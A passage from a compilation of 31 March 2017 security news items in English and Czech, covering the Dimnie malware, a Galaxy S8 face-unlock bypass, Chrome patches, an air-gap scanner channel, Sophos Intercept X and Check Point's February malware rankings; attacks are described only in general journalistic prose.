“Data exfiltration by the associated modules is performed using HTTP POST requests to another Google domain, gmail[.]com. However, just like the module downloader portion of the malware, these HTTP requests are hardcoded to be sent to an attacker controlled server. Again, Dimnie attempts to blend in by looking at least somewhat legitimate, although the data exfiltration traffic is far less convincing than that of the module downloads.” continues the analysis.

Dimnie belongs to the category of fileless malware, the researchers discovered nine modules were discovered, including some that extract system data, enumerate running processes, keyloggers, screenshots and a self-destruct module that deletes all files on the local drive.

Dimnie malware

The command and control infrastructure used in the attacks is still active and according to the experts Dimnie continues to be used against Russian-speaking targets.

“Multiple factors have contributed to Dimnie’s relatively long-lived existence. By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders’ assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown.”


Samsung Galaxy S8 facial recognition system to unlock the device can be bypassed with a photo
31.3.2017 securityaffairs Mobil

Users can unlock Samsung Galaxy S8 phone by holding their Samsung Galaxy S8 in front of their eyes or their face … or their image.
It looks like a film already seen, an IT giant presents a new product and hackers defeat its security measures. This time we are speaking of the Samsung Galaxy S8 and Galaxy S8 Plus, that has been presented at the Unpacked 2017 event this week in New York, a jewel that includes both IRIS and Facial Recognition features. These features will improve the security of the owner and experience making it simple for them to unlock their device and signing into websites.

The users can unlock their phone by holding their Samsung Galaxy S8 or Samsung Galaxy S8 Plus in front of their eyes or their face.

Cool, but we have already seen in the past that the biometric technology could be bypassed by hackers, including fingerprint scanners and IRIS scanners.

Samsung Galaxy S8 home-screen-840x473.jpg

Similar problems seem to affect the implementation of biometric technology used by Samsung to allow facial recognition. YouTube vlogger iDeviceHelp posted a video on his channel, in which the user Marcianotech demonstrated how to unlock a Samsung Galaxy S8 or Galaxy S8 Plus getting the device owner’s picture from Facebook and presenting the image to the locked phone.

Currently, there is no exact information about the image definition used in the test, neither the distance between the phone and the camera.

The company hasn’t commented the video, probably because it is still working on the feature and the software tested is likely to be a beta version. For sure Samsung will address the problem before the device will be available on the market on April 21.


FBI Chief's Secret Twitter Account Outed?

31.3.2017 securityweek BigBrothers
When Federal Bureau of Investigation Director James Comey teased that he had joined the world of social media with secret Facebook and Twitter accounts, tech writer Ashley Feinberg took the dare.

After four hours of FBI-level sleuthing, she was pretty sure she had the answer: On both he was using the name of US Protestant theologian Reinhold Niebuhr. Embarrassing: He had only one Twitter follower.

All it took, Feinberg said on the Gizmodo website where she is a senior reporter, was for Comey to tell an audience of security professionals Wednesday night that he had very cautiously joined the social networking age to keep up with family.

"I care deeply about privacy, treasure it. I have an Instagram account with nine followers. Nobody is getting in. They're all immediate relatives, and one daughter's serious boyfriend," Comey let slip.

Feinberg was piqued. "Who am I to say no to a challenge?" she wrote. She tracked down Comey's family members, eventually discovering his son Brien's Instagram account by way of a photo of him with an Instagram tag.

That led to a potential dead end: A protected account which she could not view.

But when she asked to be invited by Brien Comey to view his account, Instagram popped up with offers to follow other accounts that included Brien's mother and a mysterious "Reinhold Niebuhr," who had just nine followers.

And a Google check easily showed that Niebuhr was the subject of James Comey's 1982 university thesis.

The FBI chief, who carries the mammoth political burden of investigating the Trump administration's suspected links to Russia as both political parties eye him suspiciously, unsurprisingly also had a protected account.

But from there to Twitter was easy. Feinberg found seven Niebuhrs there, but only one with secretive identity: @projectexile7. That was the name of a program to battle gun-related crime that Comey helped develop.

That account had no tweets in three years, and followed only 27 other accounts. But those were reporters who cover the FBI, and law enforcement-related accounts. And Donald Trump.

And the one follower was a prominent expert in national security law and a friend of Comey's. Bingo.

So much for secrecy. The FBI had no comment late Thursday, but the Twitter-verse was convinced. Hours after Feinberg's report, Comey had more than 8,000 followers. Pretty good for never tweeting.


Google Patches Dangerous Vulnerabilities in Chrome 57

31.3.2017 securityweek Vulnerebility
Google on Wednesday released an update for its Chrome web browser to address five vulnerabilities in the application: one rated Critical and four High risk.

Chrome 57.0.2987.133 was released for Windows, Mac, and Linux users just weeks after version 57 of the browser graduated to the stable channel. In addition to bringing several functionality improvements, the previous browser release included the availability of CSS Grid Layout, along with patches for 36 vulnerabilities.

The most severe bug resolved in the new update is a Critical Use after free vulnerability in printing. Tracked as CVE-2017-5055, the issue was discovered by Wadih Matar, who was awarded a $9,337 bounty for the finding, according to Google’s advisory.

The first of the four High risk flaws resolved in this release is a Heap buffer overflow in V8 (CVE-2017-5054), discovered by Nicolas Trippar of Zimperium zLabs and awarded a $3000 bounty. Another was a Bad cast in Blink (CVE-2017-5052), found by JeongHoon Shin and awarded $1000.

The other two flaws included a Use after free in Blink (CVE-2017-5056), discovered by a researcher who opted to remain anonymous, and an Out of bounds memory access in V8 (CVE-2017-5053), found by Team Sniper (Keen Lab and PC Mgr) and reported through ZDI (ZDI-CAN-4587). Google didn’t reveal the bounties paid for these two issues.

A new version of Chrome for Android (57.0.2987.132) was also released this week to address a High risk Use after free vulnerability in Blink (CVE-2017-5056).

In late January, Google released Chrome 56 in the stable channel to resolve 51 vulnerabilities in the browser. Roughly two weeks later, the Internet giant announced that Gmail was dropping support for Chrome version 53 and below, hitting Windows XP and Vista users hard (Chrome 49 was the last browser iteration released for these platforms).


Pro-ISIS Amaq News Site Hacked to Serve Malware

31.3.2017 securityweek CyberCrime
Amaq News Agency Hacked

The Islamic State-affiliated Amaq news agency on Thursday said that a server hosting its propaganda and news content had been hacked, and warned that visitors were being prompted to download malicious a FlashPlayer file.

The details of the malicious file are unknown, but the Islamic State (also known as IS, ISIS, ISIL, and Daesh) news site has been a target of anti-ISIS groups in the past.

“Amaq News is constantly changing; the group does not maintain a site for a long period of time, whether due to the domain being suspended or taken down, or because the group wants to avoid being attacked,” Laith Alkhouri, Director of Research & Analysis for the Middle East and North Africa and a co-founder at cyber intelligence firm Flashpoint, told SecurityWeek.

“Though I’m not able to verify the hack, Amaq indeed released a statement warning that Amaq’s latest domain was hacked,” Alkhouri said, noting that the group’s website was currently offline.

“The attack appears to have specifically targeted Amaq after pinning down a specific vulnerability, which indicates a more targeted attack rather than a random one,” Alkhouri said. “The file might have aimed to infect machines in order to track the individuals who download the allegedly infected file rather than just merely damage their machines. The likelihood is that this attack, if ascertained, was not financially motivated.”

While it is unclear who may behind the attack, U.S. Cyber Command (CYBERCOM), part of U.S. Department of Defense, has publicly acknowledged that it has been conducting offensive cyber operations against jihadists targets.

Alkhouri said it is not clear whether the agency is carrying out these types of attacks.

“ISIS affiliated websites and accounts have previously been targeted multiple times; on more than one occasion, anti-ISIS hackers were behind these attacks,” Alkhouri said.

In June 2016, ISIS warned its supporters that a fake version of an Amaq News Agency Android mobile app was being used to spy on users.

Last April Flashpoint published a report concluding that the cyber capabilities of the Islamic State and its supporters are still relatively weak and appear to be underfunded and poorly organized. While the terrorist group has ambitions to increase its cyber capabilities, so far, online attacks claimed by pro-ISIS hackers attacks remain relatively novice-level, Flashpoint says, with most attacks being opportunistic, such as exploiting known vulnerabilities to compromise websites and launching DDoS attacks.

“Pro-ISIS cyber actors are certainly under sophisticated right now, but there is clear evidence that they are growing in number, coalescing in rank, and zooming in on American and other Western targets,” Alkhouri told SecurityWeek last year. “The more attractive the targets, the more notoriety they are gaining.”


Hackers Can Use Scanners to Control Air-Gapped Malware

31.3.2017 securityweek Virus
Researchers have published a paper describing how a piece of malware planted on an air-gapped network can be controlled remotely using an office scanner and a light source, such as a laser or a smart bulb.

The method of using scanners to jump the air gap was first summarized back in 2014 at the Black Hat Europe conference by Adi Shamir, professor of Applied Mathematics at the Weizmann Institute of Science and one of the inventors of the RSA algorithm. Shamir along with Ben Nassi and Yuval Elovici of the Ben-Gurion University of the Negev in Israel have now published a detailed research paper on this attack method.

The experiments conducted by the experts show that an attacker can send commands to a piece of malware on an isolated machine by pointing a light source at a connected flatbed scanner that has its lid open from outside the building housing the device.

The malware can be programmed to initiate scans at a specified time and date when the attacker will start sending the commands. Researchers pointed out that only the first scan date needs to be set as subsequent dates can be supplied in each attack.

The commands are transmitted as pulses from a laser or a different light source – a 1 bit is transmitted when the light source is on, and a 0 bit is sent when it’s off. The light source can be a visible laser or an invisible infrared laser, which makes the attack stealthier. The light source can be attached to a stand or a drone.

The laser attack works if there is a clear line of sight from the outside of the building to the scanner. If the view is blocked by a curtain or a wall, the attacker can remotely hijack a smart bulb located in the same room as the targeted scanner and use it to send the signals.

When Shamir first mentioned the attack method, he only described a scenario involving a laser attached to a drone. In the paper they published now, the researchers also detailed an attack involving smart bulbs, which have been known to be vulnerable to remote hacking.

In their experiments, the experts flew a drone to the third floor of an office building at a distance of 15 meters (50 feet) from the scanner. Using a transmission rate of 50 milliseconds for each bit, they managed to send the command “d x.pdf,” which can be a command for deleting a file named “x.pdf,” in 3.2 seconds. A stronger laser allowed them to conduct a successful attack from 900 meters away (0.55 miles).

In the smart bulb attack scenario, which involves hijacking the bulb and commanding it to turn on and off to transmit 1 and 0 bits, instructions were sent to the malware from a car passing by the targeted building. In this experiment, researchers simulated a ransomware attack, where the threat actor sent four bytes of data in the form of a “en q” command (i.e. encrypt directory q). The attack was carried out in four seconds at a 100 millisecond transmission rate.

Researchers pointed out that this is a two-way communication channel as the malware can use the scanner itself to emit visible light pulses that can be captured and decoded by a video recorder mounted on a drone. Videos have been published to show both the laser and smart bulb attacks:




This is not the only method devised by researchers for jumping air gaps. Over the past months, they have detailed several techniques, including ones involving HDD activity LEDs, USB devices, the noise emitted by hard drives and fans, and heat emissions.


With New iPhone, Trump Still a Target for Hackers

31.3.2017 securityweek Apple
President Donald Trump has a new phone. An iPhone.

That would not ordinarily be news, but given the security concerns about the risk of hack attacks on the prolific White House tweeter, the shift is significant.

Cybersecurity specialists say Trump's decision to transition from his Android device -- details of which were never disclosed but which was believed to be an unsecured, older-model Samsung -- is positive for security, but doesn't eliminate risks from hackers.

"I can guarantee the Russians and Chinese will try to figure out an attack," said John Dickson, a former air force cybersecurity officer who now works for the Texas-based Denim Group consulting firm.

White House social media chief Dan Scavino confirmed the smartphone shift this week, tweeting that Trump "has been using his new iPhone for the past couple of weeks here on Twitter. Yes, it is #POTUS45 reading & tweeting!"

Dickson said security will depend on how the president is using the device -- whether it is exclusively for tweeting -- and if it is plugged into an enterprise management system that can "wall off" vulnerabilities.

"If it's a single-purpose device, the risk is minimal," he said. "But as soon as you start clicking on things, downloading apps, granting access, that's when things matter tremendously."

Mobile devices can be hacked to allow an attacker to listen via the phone's microphone, access its camera, monitor geolocation or even take over the handset remotely.

Former president Barack Obama carried a BlackBerry, and later a different smartphone, with security modifications that limited its functions.

Trump's switch comes despite his call for a boycott a year ago of the iPhone maker for refusing FBI requests to help hack a device for a probe into a deadly California attack.

- More secure? -

Some analysts say Apple devices may offer more security because the company controls the hardware and software and frequently updates its operating system. Apple did not respond to an AFP query on Trump's decision.

Betsy Cooper, executive director of the University of California's Center for Long-Term Cybersecurity said that despite Apple's reputation, recent research has shown "that both iPhones and Android can be abused by hackers."

Cooper said it remains unclear how the president's social media is managed -- what devices are used and who has access to his personal @realDonaldTrump and official @POTUS handles on Twitter.

From a security standpoint, "it would be better to eliminate the personal accounts and use only government devices and government-protected social media accounts," Cooper said.

Concerns of hacking come following Trump's unverified allegation that his phones were tapped during last year's election campaign, and after leaked documents from former contractor Edward Snowden showed US tapping of German leader Angela Merkel's personal phone.

Some phones are marketed as "hardened" or secure devices for people in power, but it wasn't clear if these are used at the White House.

- Phone as 'honeypot'? -

Nicholas Weaver, a researcher at the California-based International Computer Science Institute, said Trump's phone swap "massively reduces, but does not completely eliminate, the security risks."

But while he agreed foreign governments are likely to try to hack the phone, Weaver said US intelligence services may have modified it to be "a nice honeypot to trap attempted attacks."

A honeypot is a technique used to lure hackers and attackers to identify them and find ways to neutralize or punish them.

Weaver said in a blog post earlier this year that Trump's use of an older Android device opened massive security risks and that "the working assumption should be that Trump's phone is compromised by at least one -- probably multiple -- hostile foreign intelligence services."

At the time, it was not clear what type of handset Trump was using, but a New York Times report after the inauguration said he was using "his old, unsecured Android phone."

Last month, Representative Ted Lieu of California called for an investigation, saying Trump's phone use may be "jeopardizing national security."

Dickson said that even with strong security, the president could fall victim to an attack if he uses his phone for email and web browsing.

This could be in the form of "spearphishing," or a message disguised to look as if it's from a trusted aide or family member, but which contains malware.

"This is what sophisticated attackers do," Dickson said, and because the president's activities are widely known, "he would be an easier target for spearphishing."


Bojíte se ransomwaru? Možná už nemusíte...

31.3.2017 SecurityWorld Zabezpečení
Svou klíčovou technologii Intercept X pro boj s ransomwarem a pokročilými hrozbami představila v Praze v rámci své evropské roadshow firma Sophos. Prezentaci podpořila nejen praktickými ukázkami toho, jak celé řešení funguje, ale i místem prezentace, kterým byl futuristický kamion, který budil zájem širokého okolí.

Vraťme se však k bezpečnostním technologiím. Ransomware je v současnosti hrozbou, které se bojí firmy i domácnosti -- stačí jen chvíle a soubory jsou zašifrované. Zaplatit, nebo rezignovat? Přitom stačí málo a k takové situaci by dojít nemuselo, tvrdí Peter Skondro, senior sales engineer ve společnosti Sophos, který výhody řešení Intercept X přítomným vysvětlil.

Intercept X podle něj představuje doplňující ochranu před malwarem, přičemž mimořádně účinný je zvláště v případě ransomwaru, kde tradiční antimalwary obvykle selhávají.

Díky pokročilé detekci exploitových technik totiž dokáže účelně zabránit i mnoha atakům nultého dne a ve spojení s dalšími technologiemi Sophosu tak představuje účinnou hráz pro téměř jakýkoliv typ ataku na firemní pracovní stanice.

Protože Intercept X funguje jako nadstavba klasické ochrany koncových stanic, lze jej kombinovat nejen s dalšími řešeními Sophosu, ale v podstatě s jakýmikoliv systémy ochrany endpointů třetích výrobců a díky minimální zátěži dobře funguje i na starších, méně výkonných počítačích (Intercept X v současnosti podporuje počítače s Windows 7 a novějšími, plánuje se i podpora pro Mac OS).

Intercept X podle Skondra zahrnuje čtyři klíčové vrstvy ochrany:

Anti-ransomware, který detekuje a eliminuje nevyžádané zašifrování dat a zároveň dokáže obnovit už zakódované soubory,
Anti-Exploit, který dokáže zabránit průniku malwaru nultého dne a má minimální dopad na výkonnost celého systému
Extended Cleanup (Hloubkové odstranění malwaru), který prostřednictvím forenzní analýzy odstraňuje různé typy hrozeb, aniž by znal nějaké jejich signatury
Root cause Analysis (Analýza prvotních příčin), který podrobně analyzuje atak malwaru

Jak účinné je zadržování malwaru?

Malware pro koncové body lze podle Skondra eliminovat hned několika různými metodami. Nejčastěji jde o omezení oblastí, kudy může malware do koncové stanice pronikat – ať už jde o různé typy filtrování, nastavení reputace stahovaných souborů apod. Tak lze zamezit průniku až 80 % všeho škodlivého kódu.

Druhou klíčovou metodou je analytika před aktivací malwaru, jako je třeba heuristika – tak lze eliminovat až 10 % malwaru. A pak tu jsou samozřejmě signatury známých řetězců, které zachytí okolo 5 % škodlivého kódu.

Výše popsané metody se ale týkají tradičního malwaru. Ten moderní se ale výše zmíněným způsobům detekce dokáže velmi úspěšně vyhnout. I na něj ale lze podle Skondra vyzrát – díky analýze chování či detekce technik exploitů jde eliminovat zbývající 3 %, respektive 2 % nákazy. Přitom právě dvě posledně jmenované metody se v současném světě malwaru jeví jako klíčové.

1. Eliminace ransomwaru

Základem ochrany před ransomwarem je technologie CryprtoGuard. Ta totiž dokáže velice efektivně detekovat podezřelé šifrování dat a zastavit jej ještě před tím, než napáchá v koncových stanicích nějaké škody.

CryptoGuard totiž při otevírání libovolného souboru nějakým procesem automaticky vytváří záložní kopii původního souboru a při jeho uzavření a zápisu se tato kopie porovná s nově zapsaným, vysvětluje Skondro. Pokud ale CryptoGuard zjistí nějaké zásadní změny nebo dokonce záměna souborového typu, považuje se soubor za zašifrovaný.

V případě, že se v krátkém časovém úseku taková detekce objeví u více souborů, CryptoGuard považuje počítač za napadený zatím neznámým ransomwarem. Proces, který takové operace na soubory vykonává, se umístí do karantény a zruší se mu právo zapisovat do souborového systému.

Po celou dobu se přitom na obrazovce uživatele ukazuje ekvivalent semaforu ukazující, v jakém stavu se nalézá koncová stanice uživatele (zelená -- vše Ok, žlutá -- něco se děje, červená – pozor, nastaly problémy se zabezpečením). V tuto chvíli se tedy na koncové stanici rozsvítí červené světlo.

Díky předchozím krokům CryptoGuard dokáže znovuobnovit fungování koncové stanice i ransomwarem zašifrované soubory -- ty lze totiž získat z předem vytvořených kopií otevíraných souborů.

Zároveň se pošle příslušný alarm do centrální správy, začnou se sbírat informace potřebné pro podrobné analyzování nastalé situace a spustí se hloubkové odstraňování malwaru pomocí funkce Sophos Clean, viz níže.

Na konci celého procesu nápravy tak jsou nezašifrované soubory s původním obsahem a obnovený systém bez nákazy – semafor se opět rozsvítí zelenou barvou.

Podobně to funguje i v případě, kdy ransomware je na vzdáleném klientovi, který přistupuje k souborovému serveru – při otevírání souborů se opět vytváří záložní kopie, která se porovnává s nově zapsaným souborem.

Pokud se zjistí nějaké nesrovnalosti, viz výše, CryptoGuard označí vzdáleného klienta za napadeného ransomwarem a zruší mu přístup k souborovému systému. Z kopií se obnoví původní data a centrální správě se zašle odpovídající upozornění.

2. Detekce malwaru prostřednictvím technik exploitů

V současnosti existuje celá řada technik exploitů, kterými lze kompromitovat uživatelovu koncovou stanici, tvrdí Skondro. Intercept X podle něj dokáže takové procesy monitorovat a zároveň detekovat pokusy o zneužití exploitů využívajících techniky, jako je například buffer overflow nebo code injection. Tímto způsobem zamezí zneužití různých zranitelností v nezabezpečených aplikacích nebo v programech, kde se ještě nenainstalovaly odpovídající záplaty.

Celé řešení přitom není postavené na signaturách, takže dokáže eliminovat i neznámá rizika. Svou architekturou také nemá žádný dopad na výkon celého systému.

3. Analýza prvotních příčin

Součástí Intercept X je i sofistikovaný systém analýzy prvotních příčin incidentů. Samotné odpojení zasažené pracovní stanice totiž podle Skondra neřekne nic o tom, co přesně se vlastně stalo, jaké systémy či soubory byly incidentem zasažené a jak lze do budoucna tomuto problému zamezit.

Právě na tyto otázky odpovídá zmíněný systém analýzy prvotních příčin. Podrobným zkoumáním totiž identifikuje ovlivněné procesy, klíče registrů, soubory i komunikační kanály, prostřednictvím detailní grafiky ukáže jednotlivé událostí i jejich souvislosti a zjistí prvotní zdroj infekce. Zároveň zjistí, které soubory a systémy byly událostí zasažené a které systémy by se měly nechat vyčistit.

Systém analýzy prvotních příčin zároveň může poradit, jak se obdobné nákaze příště vyhnout, dodává Skondro.Například které vstupní kanály pro malware je dobré uzavřít či jak efektivně zabránit šíření malwaru uvnitř podnikové sítě.

4. Hloubkové odstranění malwaru

Pro pokročilou likvidaci kybernetické nákazy využívá Intercept X nástroj Sophos Clean, což je skener a čistič malwaru, který funguje na vyžádání a pracuje bez potřeby nejakých signatur. Pomocí forenzních metod dokáže zjišťovat známý i neznámý malware, tvrdí Skondro.

Ke své činnosti využívá detekci chování a zároveň cloudové zpravodajství hrozeb. Dokáže také nalézt a vyjmout persistentní škodlivý kód a případné napadené systémové soubory systému Windows dokáže nahradit originálními verzemi.

Propojení s dalšími řešení Sophosu

Intercept X představuje pouze sofistikovanou nadstavbu ke klasické ochraně koncových bodu, takže pro plnou ochranu je nutné propojit jej s dalšími obrannými technologiemi.

Například ve spojení s Sophos Central Endpoint Advanced můžete získat kromě výše popsaných funkcionalit řešení Intercept X také klasickou antimalwarovou ochranu, detekci škodlivého provozu, HIPS, kontrolu webu, aplikací a dat, filtrování webů v koncových stanicích centrální správu a řadu dalších funkcí, díky nimž uživatelé získají komplexní ochranu koncových bodů, vysvětluje Skondro.

Dalším stupněm je integrace Intercept X s Sophos XG, firewally nové generace (NGFW) a šifrovacím řešením SafeGuard Encryption. Využívá se přitom ekosystém sdílené inteligence Security Heartbeat, kdy se synchronizuje zabezpečení prostřednictvím více řešení v reálném čase, což zlepšuje účinnost ochrany.

Intercept X jako dopln&ecaron;k

Jak Intercept X doplňuje existující řešení ochrany endpointů

(Zdroj: Sophos)

Příkladem toho, jak efektivně může taková kombinovaná obrana pracovat, je například situace, kdy Endpoint Advanced nebo Intercept X zaznamená infekci na koncové stanici, prostřednictvím systému Security Heartbeat dostane tuto zprávu agent SafeGuard Encryption, který okamžitě vymaže z paměti zařízení šifrovací klíče, které by šlo zneužít. Vzápětí Security Heartbeat informuje o kompromitaci stanice příslušný firewall, který ji odpojí od sítě, resp. ji dá do karantény, než se malware odstraní, vysvětluje Skondro.

Sophos takto propojenou obranu označuje jako Synchronized Security. Nahrazuje donedávna používaný koncept, kdy bezpečnostní řešení navzájem koordinovaly svou činnost jen výjimečně a kvůli tomu byly málo účinné proti novým typům hrozeb.

Synchronized Security totiž podle Skondra dokáže nákazu nejen detekovat, ale i zjistí, které systémy byly skutečně zasažené, učinit patřičné kroky pro nápravu a navíc správcům přinést podrobnou analýzu toho, co se ve skutečnosti stalo a jak tomu příště předejít. A to je něco, co bylo donedávna jen snem bezpečnostních manažerů.


Nejrozšířenější malwarovou rodinou byl v únoru botnet Kelihos

31.3.2017 SecurityWorld Viry
Check Point Software Technologies zveřejnil únorový Celosvětový index dopadu hrozeb, podle kterého se downloader Hancitor poprvé umístil v Top 5 nejrozšířenějších malwarových rodin.

Zároveň byl vydán žebříček zemí, které jsou nejčastěji terčem kyberútoků. Česká republika zaznamenala nárůst útoků a posun o 15 míst na nebezpečnější 41. pozici. Slovensko se naopak posunulo o 36 míst mezi bezpečnější země a aktuálně mu patří 65. pozici.

Na prvním místě se v Indexu hrozeb umístila Zambie, která se posunula o 13 míst. Největší skok mezi nebezpečnější země zaznamenal Katar, který se vyhoupl ze 118. příčky na 58. Celkově žebříček doznal v únoru mnoha změn a řada nebezpečnějších zemí se posunula mezi bezpečnější a naopak.

Downloader Hancitor, který na infikovaných zařízeních instaluje například bankovní trojské koně nebo ransomware, se posunul o 22 míst po více než ztrojnásobení globálního dopadu v uplynulém měsíci. Hancitor, někdy označovaný také jako Chanitor, se obvykle šíří prostřednictvím Office dokumentů s makry ve phishingových e-mailech s „důležitými“ zprávami, jako jsou hlasové zprávy, faxy nebo faktury.

Index vyhodnotil Kelihos, botnet používaný k bitcoinovým krádežím, jako nejrozšířenější malwarovou rodinu s 12 % ovlivněnými organizacemi po celém světě. Kelihos je aktivní od roku 2010 a dokázal se přizpůsobit od obyčejných spamových kampaní k pronajímání botnetu na rozesílání spamu komukoli, kdo je ochoten zaplatit. Přestože byl odstaven v roce 2011 a znovu o rok později, pokračoval i tak ve vývoji a transformaci v botnet a vzrostl více než třikrát během pouhých dvou dnů loni v srpnu. V současné době Kelihos stále roste a je to jeden z nejvýznamnějších distributorů nevyžádané pošty na světě. Disponuje „armádou“ s více než 300 000 infikovanými počítači, z nichž každý může posílat více než 200 000 e-mailů každý den.

Z analýzy Top 3 malwarových rodin vyplývá, že hackeři používají při útocích na organizace širokou škálu útočných vektorů a taktik. Tyto hrozby mají dopad na celý infekční řetězec, včetně nevyžádaných e-mailů, které se šíří pomocí botnetů, a downloaderů, které nakonec umístí ransomware nebo trojského koně do počítače oběti.

Top 3 nejrozšířenější škodlivé kódy v únoru byly Kelihos, který ovlivnil 12 % organizací, HackerDefender, který měl dopad na 5 %, a Cryptowall, který ovlivnil 4,5 % organizací po celém světě.

Top 3 - malware:

Kelihos - Botnet zaměřený především na bitcoinové krádeže a rozesílání spamu. Využívá peer-to-peer komunikaci, která umožňuje každému jednotlivému uzlu působit jako C&C server.
HackerDefender - Uživatelský rootkit pro Windows může být využit ke skrytí souborů, procesů a klíčů registru, a také k implementaci backdooru a přesměrování portu, který funguje na základě TCP portů otevřených stávajícími službami. Takže není možné najít skryté backdoory tradičními postupy.
Cryptowall – Ransomware, který začínal jako Cryptolocker doppelgänger, ale nakonec jej překonal. Po odstavení ransomwaru Cryptolocker, se stal Cryptowall jedním z nejvýznamnějších ransomwarů současnosti. Cryptowall je známý pro využití AES šifrování a komunikaci s C&C serverem přes anonymní síť Tor. Šíří se prostřednictvím exploit kitů, škodlivé reklamy a phishingových kampaní.

V oblasti mobilního malwaru došlo k několika zajímavým změnám. Nejaktivnější variantou byl v únoru Hiddad, který do čela poskočil z 3. příčky, na druhém místě skončil Hummingbad a z prvního místa se na třetí propadl backdoor Triada.

Top 3 - mobilní malware:

Hiddad – Android malware, který přebaluje legitimní aplikace a pak je umísťuje do obchodů třetích stran. Jeho hlavní funkcí je zobrazování reklam, ale může také získat přístup ke klíčovým bezpečnostním informacím obsaženým v operačním systému, což umožňuje útočníkovi získat citlivá uživatelská data.
Hummingbad - Malware se zaměřuje na zařízení se systémem Android a vytváří trvalý rootkit na zařízení, instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako například instalace keyloggeru, krádež přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat.
Triada - Modulární backdoor pro Android, který uděluje superuživatelské oprávnění pro stažení malwaru a pomáhá jej vložit do systémových procesů. Triada take umí zfalšovat URL odkazy uložené v prohlížeči.

„Nárůst využití různých malwarových variant ukazuje problémy, kterým čelí IT oddělení po celém světě. Je nezbytně nutné, aby se organizace dostatečně vybavily na boj s neustále rostoucím počtem hrozeb a využívaly napříč celou podnikovou sítí pokročilé bezpečnostní systémy,“ říká Peter Kovalčík, SE Manager ve společnosti Check Point.

Check Point analyzoval i malware útočící na podnikové sítě v České republice a i v únoru pokračoval vzestup nových škodlivých kódů. Conficker se po výrazné dominanci během roku 2016 umístil v únoru až na 4. příčce.

Na první místo se naopak vyhoupl botnet Kelihos, který odsunul na druhou pozici ransomware Cryptowall. Na 3. příčce byl rootkit HackerDefender.

Top 10 malwarových rodin v České republice – únor 2017

Malwarová rodina

Popis

Kelihos

Botnet Kelihos (neboli Hlux) je P2P botnet zapojený především do krádeží bitcoinů, těžení bitcoinu a odesílání nevyžádané pošty. Šíří se prostřednictvím spamu, který obsahuje odkazy na další malware. Botnet může také komunikovat s ostatními počítači a vyměňovat informace o zasílání spamu, krást citlivé informace nebo stáhnout a spustit škodlivé soubory. Pozdější verze se většinou šíří přes weby sociálních sítí, zejména Facebook.

Cryptowall

Cryptowall je hlavní ransomwarový trojan, který šifruje soubory na infikovaném počítači a pak žádá po uživatelích zaplacení výkupného za dešifrování. Šíří se prostřednictvím škodlivých reklamních a phishingových kampaní. Cryptowall se poprvé objevil v roce 2014.

HackerDefender
HackerDefender je rootkit pro Windows 2000 a Windows XP a může fungovat i na pozdějších verzích Windows NT. Rootkit upravuje různé funkce ve Windows a API, aby se vyhnul detekci bezpečnostním softwarem. HackerDefender je široce rozšířený, protože je volně k dispozici na internetu a lze snadno nainstalovat.

Conficker
Conficker je počítačový červ, který se zaměřuje na operační systém Windows. Využívá zranitelnosti v operačním systému a zkouší odhadnout administrátorské heslo pro další šíření a vytvoření botnetu. Infekce umožňuje útočníkovi získat přístup k osobním údajům uživatelů, jako jsou bankovní údaje, čísla kreditních karet nebo hesla. Červ původně cílil na uživatele komunikačních stránek, jako jsou Facebook, Skype a e-mailové stránky.

Fareit
Fareit je trojský kůň, který byl poprvé detekován v roce 2012 a jeho varianty obvykle kradou uživatelský jména a hesla uložená ve webových prohlížečích. Navíc kradou také identifikační údaje k e-mailu a FTP, jako jsou seznam adresářů, heslo, číslo portu, název serveru, typ serveru a uživatelské jméno.

TorrentLocker
Torrentlocker je ransomwarová rodina, která šifruje uživatelské dokumenty, obrázky a další typy souborů. Útočníci po oběti požadují za dešifrování platbu 4,1 bitcoinů (přibližně 1800 dolarů).

Slammer
Paměťový rezidentní červ cíleně útočí na Microsoft SQL 2000. Rychlé šíření umožňuje využít DoS útoky na vytipované cíle.

Delf
Delf je velká rodina trojských koňů, používaných ke krádežím dat. Některé varianty se liší tak výrazně, že jsou klasifikovány jako červy nebo viry.

Škodlivé aktivity jsou velmi variabilní, od ukončování procesů, přes krádeže dat až po stahování dalšího malwaru.

RookieUA
RookieUA je určen ke krádežím informací. Získává informace o uživatelských účtech, jako jsou přihlašovací jména a hesla, a odesílá je na vzdálený server. HTTP komunikace probíhá pomocí neobvyklého uživatelského agenta RookIE/1.0.

Hancitor
Downloader využívany k instalaci škodlivého kódu, jako jsou bankovní trojany a ransowmare na infikovaných strojích. Hancitor, někdy označovaný také jako Chanitor, se obvykle šíří prostřednictvím Office dokumentů s makry ve phishingových e-mailech s „důležitými“ zprávami, jako jsou hlasové zprávy, faxy nebo faktury.

Graftor
Graftor je adware a zneužívá webový prohlížeč. Svými vlastnostmi se podobá trojskému koni. Může být použit jako nástroj pro stažení dalších škodlivých kódů. Je také znám pro skrývání spustitelných příkazů a DLL v PNG souborech, aby se vyhnul detekci. Některými dodavateli je vnímán jen jako nežádoucí program, ale Graftor má rootkitové schopnosti a C&C funkce, které z něj dělají mnohem nebezpečnější malware, než je jen obyčejný adware.

Online mapa kybernetických hrozeb ThreatCloud Map sleduje v reálném čase, jak a kde po celém světě probíhají kybernetické útoky, a pro to využívá informací z Check Point ThreatCloud, největší sítě pro spolupráci v boji s kybernetickými hrozbami, a přináší data o hrozbách a trendech z celosvětové globální sítě senzorů.

Databáze ThreatCloud analyzuje více než 250 milionů adres a detekuje případné nakažení boty, obsahuje přes 11 milionů malwarových signatur a více než 5,5 milionu infikovaných webových stránek a identifikuje miliony malwarových typů každý den.


Velká aktualizace pro Windows 10 vyjde 11. dubna

31.3.2017 Novinky/Bezpečnost Zranitelnosti
Dlouho očekávanou aktualizaci operačního systému Windows 10, která přinese řadu nových funkcí, vydá společnost Microsoft 11. dubna. Zástupci amerického počítačového gigantu to potvrdili ve středu.
Vydání aktualizace známé jako Creators update chystali vývojáři Microsoftu několik posledních měsíců. Kdy přesně ji vydají však doposud jisté nebylo, přestože již dříve se objevily spekulace, že se tak stane v průběhu dubna. Nyní je již jasné, že se tak stane v úterý 11. dubna.

